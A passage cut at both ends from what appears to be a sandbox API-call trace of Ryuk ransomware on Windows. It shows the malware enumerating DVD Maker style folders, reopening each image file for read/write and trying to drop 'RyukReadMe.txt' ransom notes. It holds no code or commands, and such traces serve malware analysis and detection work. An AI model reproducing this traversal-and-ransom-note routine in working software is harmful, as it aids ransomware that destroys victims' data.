Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.530] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.530] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.531] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.531] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.531] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.532] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.532] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.532] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.532] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.533] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.533] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.533] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.534] SetLastError (dwErrCode=0x0) [0133.534] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.536] GetLastError () returned 0x5 [0133.537] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.537] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.537] SetLastError (dwErrCode=0x0) [0133.537] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.537] GetLastError () returned 0x5 [0133.537] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.537] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.539] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.539] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.539] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png", dwFileAttributes=0x80) returned 0 [0133.539] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.540] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.540] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png", dwFileAttributes=0x80) returned 0 [0133.540] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.540] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.541] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png", dwFileAttributes=0x80) returned 0 [0133.541] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.541] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.541] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.541] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png", dwFileAttributes=0x80) returned 0 [0133.541] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.541] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.541] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.542] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png", dwFileAttributes=0x80) returned 0 [0133.544] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.545] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.545] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png", dwFileAttributes=0x80) returned 0 [0133.545] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.545] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.545] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png", dwFileAttributes=0x80) returned 0 [0133.546] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.546] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.546] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0133.547] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.547] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.547] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png", dwFileAttributes=0x80) returned 0 [0133.547] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.547] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.548] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png", dwFileAttributes=0x80) returned 0 [0133.548] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.548] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.548] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.548] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.548] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png", dwFileAttributes=0x80) returned 0 [0133.548] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.548] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.549] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.549] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png", dwFileAttributes=0x80) returned 0 [0133.549] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.549] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.549] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.549] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png", dwFileAttributes=0x80) returned 0 [0133.550] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.550] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.550] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.551] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png", dwFileAttributes=0x80) returned 0 [0133.551] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.551] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.551] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png", dwFileAttributes=0x80) returned 0 [0133.551] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.551] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.552] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png", dwFileAttributes=0x80) returned 0 [0133.552] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.552] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.552] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.552] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.552] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.552] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png", dwFileAttributes=0x80) returned 0 [0133.553] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.553] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.553] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.553] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.553] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.554] SetLastError (dwErrCode=0x0) [0133.554] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.556] GetLastError () returned 0x5 [0133.556] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.557] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", dwFileAttributes=0x80) returned 0 [0133.557] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.557] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.558] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.558] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.558] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.558] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.558] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.558] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.558] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.559] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.559] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.559] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.559] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.559] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.560] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 